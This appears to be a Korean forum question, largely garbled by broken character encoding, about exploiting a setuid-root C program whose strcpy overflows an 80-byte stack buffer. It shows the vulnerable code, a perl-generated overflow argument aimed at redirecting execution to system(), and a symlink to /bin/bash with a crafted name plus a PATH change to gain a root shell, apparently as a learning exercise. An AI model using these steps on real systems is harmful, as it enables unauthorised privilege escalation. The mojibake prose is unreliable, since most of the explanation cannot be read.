µ
Դ ϱ ѹ оµ ذ ȵǴ ֽϴ.
vuln.c(root setUID,setGID)
~~~~~~~~~~~
~~~~~~~~~~~~
~~~~~~~~~~~~ ⺻
int main(int argc,char *argv[])
{
char buffer[80];
if(argc<2){
printf("׳ ַ \n");
return 1;
}
strcpy(buffer,argv[1]);
printf(" %s\n", buffer);Ŵ ¥ ߿ѰŸ
}
ø ƽð Ʈ ж°ǵ.
Ͼ巹 ǵ鿩 ȲѴٴ ε....
⼭
״ žƴѳ ѱԿ.
¼ ¼ؼ system() 巹
./vuln `perl -e 'print"A"x84, "ٰ 巹 Ʋ ε "'`
ַ
bash: ?? command not found ٴ°Ŷ ؼ
ϴ ̶ xxd Ȯϴ ffdf ffaf ffcf ffdf ̷ 淡
ln -s /bin/bash `perl -e 'printf "ּ"'`
̶ , ε ƴϱ⋚ PATHȭ溯
θ ھҽϴ.
⼭ ./vuln ʿ print ϰ lnʿ printfϳ?
|